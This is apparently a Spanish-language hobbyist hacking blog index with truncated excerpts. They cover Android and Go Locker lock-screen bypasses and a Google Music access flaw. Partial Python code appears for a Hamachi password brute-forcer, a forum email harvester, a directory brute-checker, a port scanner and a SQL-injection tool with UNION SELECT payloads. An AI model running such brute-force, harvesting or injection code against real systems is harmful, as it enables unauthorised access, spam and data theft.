Komtec1 - "Is There Anybody Out There?"

Bueno, jugando con el teléfono y cambiando patrones de bloqueo me di cuenta de este bypass, a continuación lo explico: Si vamos a ajustes -> Ubicación y seguridad    -> Cambiar bloqueo de pantalla Nos pide nuestro bloqueo actual -> si es que el teléfono cuenta con uno, una vez que lo ingresamos nos lleva a la siguiente pantalla donde podemos seleccionar "Ninguno", "Patrón", "PIN" ó "Contraseña Si seleccionamos Ninguno nos quita el bloqueo, pues ya confirmamos antes nuestro pin, patrón o contraseña que ocupábamos y no nos pide nada más. Hasta ahí todo bien, ahora, ponemos una contraseña de nuevo, al ingresar no pide nada pues nuestra contraseña ya fue quitada, seleccionamos pin (o el que quieran ustedes), lo ponemos, nos pide la confirmación y todo ok, si salimos con el boton central del telefono (el home) nos lleva a la pantalla principal, si vamos nuevamente a ajustes -> Ubicación y se...

Hola!! Como puse en un post anterior aqui merito mismo en mi blog, estaba revisando unas cosas sobre Google Music, por casualidad, causalidad o como lo quieran llamar encontre lo que a mi parecer son unos fallos de seguridad, yo como niño bueno, los reporte a Google, pero ellos me contestaron que naranjas dulces, que no es fallo de seguridad :(, por lo que si ellos dicen que no es nada malo, entonces puedo liberarlo y empezar a hacer herramientas para eso, pues es 100% legal y no es un fallo de seguridad :D (al final pongo lo que me contestaron :P) El diagrama del fallo (segun yo) es el que pongo a continuación (no soy un experto en diagramas, digan que hice una imagen, generalmente lo explicaría con texto! xD) Por pasos: 1.- es lo normal, user y pass para ingresar a gmail 2.- te setean cookies en el navegador para que puedas ingresar a tus servicios de google 3.- en music.google.com buscas la cancion que tu quieras En este punto (4) esta lo interesante... 4.- se gener...

Bueno, hace un tiempo que estoy demasiado a gusto con Google Music, quito de midisco duro aproximadamente unos 50 gb que tenia en música, por lo que yo, la verdad feliz! jejeje, lo que me he preguntado y me he puesto a investigar un poco es sobre su privacidad en cuanto a mis archivos "en la nube", no lo he visto por que me preocupe el hecho de que alguien descargue mis archivos musicales xD si no, creo que todo lo contrario, he pensado que de una u otra forma se puede hacer ese contenido compartido para que x persona lo pueda escuchar SIN que este logueado en mi cuenta claro, "osease" si el archivo mp3 esta ahí, de alguna forma podría compartirlo. Me puse a estudiar un poco la DB SQLite que se crea en un telefono con android, y ahi viene toda la información que utiliza google para que se pueda reproducir el archivo y mostrar su imagen correspondiente, por mientras lo que pude ver es que las imagenes se pueden accesar de forma directa (los AlbumArt), un ejemplo e...

Bueno, ahora les voy a platicar un poco sobre una aplicación para Android, se llama Go Launcher, esta sirve en pocas palabras para que nuestro lanzador de aplicaciones en el telefono se vea "fancy" (xDD), este a su vez tiene algunos plugins de complemento, uno de ellos se llama Go Locker. Go Locker sirve para que nuestro telefono al blockearse tambien se vea rockeroso, la configuración de los temas depende de su creador, algunos dan más opciones, otros ninguno, etc, etc. Hoy jugando con el teléfono y "tuneandolo" instalé varios temas para cuando se bloquea, entre ellos nombro algunos por si quieren descargarlos: Golden New Year Dark 3D Worm -> (este es del que hablaremos) Y claro, tambien tiene instalado el default. El que les menciono arriba tiene un aspecto genial (a mi parecer), es un gusano en 3d que camina por su pantalla y para desbloquear el teléfono ustedes tienen que cortarlo a la mitad :D, tipo fruit ninja pero con gusanos!  Esta es una c...

Como eso de tomar litro y medio de café (aprox) no deja nada bueno, me puse a hacer este pequeño código, es un bruteforce para Hamachi, esta hecho en python, funciona con un wordlist y mediante argv, la forma de ejecutarlo es la siguiente:  python hamachibf.py nombredered /ruta/archivo/wordlistpass.txt El script esta probado en linux, sobre windows no se si funcione (no creo) ya que utilizo la forma de ingresar a una red en hamachi desde consola por linux, y no se si en windows sea igual, en caso de que si sea lo mismo, pues funcionaría :P  Si encuentra el password los va a loguear de manera automática a la red. Dejo una captura de pantalla, el codigo, el enlace para pastebin y creo que nada más :P  #!/usr/bin/python import socket import urllib2 import sys import os import string import urllib import re import subprocess class Command(object):     def __init__(self, command):         self.command = command      def ru...

Bueno, el día de hoy estaba de ocioso, me aburri de programar un sistema en el que ando y me puse a programar un extractor de mails con python, creo que si es un poco mas rápida la ejecución de codigo que con php, aparte que hace rato no hacia nada con python, entonces pues no esta mal de vez en cuando :P El código es sencillo, espero les guste y les sirva de algo, en caso de que no, al menos se haya entretenido leyendo el parrafo anterior! xD :P Imagen de como se ve: #inicio del code -------------- #/usr/local/bin/python # -*- coding: utf-8 -*- import os import urllib import string import re import sys import time import datetime import random t0 = time.clock() correito = re.compile('([\w\-\.]+@(\w[\w\-]+\.)+[\w\-]+)') print 'Burning Board 2.2.2 mail xtrakt0r' print '------------Komtec1--------------' print '-----komtec1[at]gmail[dot]com----' print '\n Ingresa el nombre con el que vas a guardar el archivo' nombre = ra...

Bueno aqui un codesillo que hice, es para chekar los directorios de una pagina, mediante un diccionario, les dejo la imagen y el codigo :-D esta en python ^^ import socket import urllib2 import string print '\n |---------------------------------------------------------------------------------------|' print '\n |--------------------------| Komtec1 komtec1[at]gmail[dot]com |------------------------|' print '\n |--------------------| www.diosdelared.com komtec1.diosdelared.com |--------------------|' print '\n |------------------------------------| chekdirs.py |------------------------------------|' print '\n |---------------------------------------------------------------------------------------|' print '\n |-----------------------| la direccion tiene que terminar con / |---------------------|' print '\n |-----------------------| ej: http://example.com/ |---------------------|' print '\n |----------------------------------------...

Bueno, cuando jugaba bitefight, y no tenia pociones de salud completa xDDDDDDD me quedaba mucho tiempo sin salud y tardaba mucho en curarme jejejeje xD (en que cosas me entretengo no?? xD) entonces dije si pudiera usar una pocion cada hora (por que como soy de olvidadizo algunas veces usaba una pocion hasta cada dos horas y asi x_X ) entonces me puse a pensar como podia hacer eso. Se resolvio de una forma sencilla, hice 3 codigos en html cortitos para poder tener un "autoregen" (asi lo llame yo :-P) el primero (index.html) que contenia los frames que llamaba y el tiempo en el que se refrescaba la pagina: Autoregen el segundo que era el que hacia que se usaran las pociones en automatico (uno.html): el link que ven ahi, es el que me salia de pocion, si se usa la pocion y no se da en el link que dice Actualizar entonces su link no cambiara y asi podran usar un mismo link para muchas pociones y el tercero (tres.html) Documento sin título Espera por fav...

Bueno ultimamente he estado algo alejado por cuestiones de trabajo en exceso xD (o como diria Ban soy un workaholic! xD) pero pues en esos ratos libres que tengo me distraigo un poco con un juego que se llama bitefight en el vi un menu genial que se despliega cuando posicionas el mouse sobre un y en el se pone informacion, me llamo la atencion y lo queria integrar a un sistema que ando haciendo . aqui una imagen de como se despliega: entonces despues que vi que utilizaba tooltip (un javascript) solo restaba integrarlo, y adaptarlo a mis necesitades jejej adelante les pondre el archivo, que lo tomaran como referencia nada mas puesto que no pongo la db ni nada asi, pero podran ver el code despues de integrar el tooltip, necesitaba que el sistemilla hiciera unas validaciones, si 4 campos estaban llenos solamente que me mostrara un boton rojo, si eran entre 5y 8 naranja, 9 a 15 verde y 16 amarillo, lo que hice es que al momento de jalar los valores en la base de datos, dec...

Bueno hace pocos dias me pase por el foro de diosdelared que ahora creo que es tilatino o algo asi, (ya les hice la propaganda :P) pero bueno la cosa es que vi en un post que pedian un programa para contar los correos (o bien conocidos maillist :P) pues hice un script pequeño para contarlos, que la idea salio de que un dia Nath (o Nathaniel como lo conoscan :P) de que queria leer una linea para hacer quien sabe que cosa y de ahi quien sabe que otra cosa para que al final diera otra cosa mas xDDDDD y de ahi recorde que podria reutilizar ese pequeño pedazo de code para hacer un contador :P esta muy sencillo y no tiene delimitadores (por ejemplo que cuente despues de cada , (coma) o algo asi) solo cuenta por cada salto de linea, asi que piensen dos veces antes de adquirir sus ml* :P aqui se los dejo, esta en python** ^^ file = open( "mails.txt","r" ) cuenta = 0 for x in file.readlines(): cuenta = cuenta + 1 print "En total son" , cuenta, "correos...

Bueno siguiendo con las clases de python xDD jeej hice un simple scanner de puertos, si se les ocurre algo que ponerle diganme y trataremos de ponerlo para las futuras versiones :-D import socket print "Simple Port Scanner - chekp0rt" print "Komtec1 komtec1[at]gmail[dot]com" print "www.hslteam.org" def chekandopuertos (): probandoconexion = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) try : probandoconexion . connect (( ip , x )) print "Puerto" , x , "abierto en " , ip print probandoconexion . connect (( ip , x )) probandoconexion . close () except : pass probandoconexion . close () ip = raw_input ( "Ingresa la IP: " ) pinicial = int ( raw_input ( "Ingresa el puerto Inicial: " )) pfinal = int ( raw_input ( "Ingresa el puerto final: " )) for x in range ( pinicial , pfinal ): try : chekandopuertos () except : pass y les adjunto el archivo y un screen de como funciona Lengu...

Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena: The used SELECT statements have a different number of columns y de ahi sacar el numero de columnas. ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo y tambien si tienen ideas son aceptadas para ver que mas le podemos poner :-D aqui les dejo el code: import urllib2 import string uno = "-1/**/union/**/select/**/" dos = "-1+union+select+/" print '\n |-----------------------------------------------------------|' print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|' print '\n |-------------------| esekuele.py |-------------------------|' print '\n |-----------------------------------------------------------|' print '\n |Uso: \n I...